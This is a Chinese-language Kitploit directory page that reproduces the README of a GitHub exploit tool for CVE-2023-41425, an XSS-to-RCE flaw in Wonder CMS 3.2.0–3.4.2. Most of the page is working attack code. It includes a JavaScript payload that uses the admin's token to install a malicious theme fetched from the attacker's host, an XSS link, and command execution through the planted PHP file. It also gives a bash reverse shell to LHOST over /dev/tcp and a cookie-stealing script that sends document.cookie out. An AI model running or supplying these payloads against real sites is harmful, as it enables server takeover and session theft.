Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-41425 — XSS-to-RCE 漏洞利用工具,适用于 Wonder CMS 3.2.0–3.4.2,支持自动化载荷投递、反弹 Shell,以及通过恶意主题安装窃取 Cookie。 | Kitploit
工具/GitHubGitHub/charlesgargasson/cve-2023-41425
Payload生成漏洞利用Web应用程序漏洞利用信息收集钓鱼攻击渗透测试
GitHubcharlesgargasson/cve-2023-41425

CVE-2023-41425

XSS-to-RCE 漏洞利用工具,适用于 Wonder CMS 3.2.0–3.4.2,支持自动化载荷投递、反弹 Shell,以及通过恶意主题安装窃取 Cookie。

查看仓库
1122年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Wonder CMS RCE

| | 描述 : XSS 到 RCE,Wonder CMS 3.2.0 <= 3.4.2 | 来源 | - https://github.com/prodigiousMind/CVE-2023-41425/tree/main | - https://nvd.nist.gov/vuln/detail/CVE-2023-41425 |


RCE


.. code-block:: bash

设置变量

RHOST="http://host.com:80" LHOST="10.10.14.152" LPORT="4444" LPORTWEB="80"

进入临时目录

cd $(mktemp -d)

创建恶意主题压缩包

mkdir -p evil cat <<'EOF'>evil/evil.php

EOF

zip -r evil.zip evil/

将安装新主题的 JS 载荷

cat <xssrce.js var xhr=new XMLHttpRequest(); xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true); xhr.send(); EOF

打印 XSS 链接

echo -e "\n# XSS RCE" cat <<EOF ${RHOST}/index.php?page=loginURL?"><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"><form+action=" EOF

启动新 Web 服务器以提供载荷

sudo python3 -m http.server $LPORTWEB &

|

| 将 RCE XSS 发送给管理员后,我们会得到以下 HTTP 调用

.. code-block::

10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| 现在我们可以利用 PHP 载荷

.. code-block:: bash

id

CMD="id" curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

反弹 Shell(别忘了先监听:nc -nvlp 4444)

CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'" curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

|


Cookies


| 你还可以窃取 Cookie(从而获取 PHP 会话)

.. code-block:: bash

cat <xsscookie.js var xhr=new XMLHttpRequest(); xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true); xhr.send(); EOF

echo -e "\n# XSS 获取 PHP 会话" cat <<EOF ${RHOST}/index.php?page=loginURL?"><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"><form+action=" EOF

|

下载工具